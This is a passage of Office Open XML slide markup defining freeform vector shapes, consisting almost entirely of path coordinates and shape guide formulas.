                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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4119" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
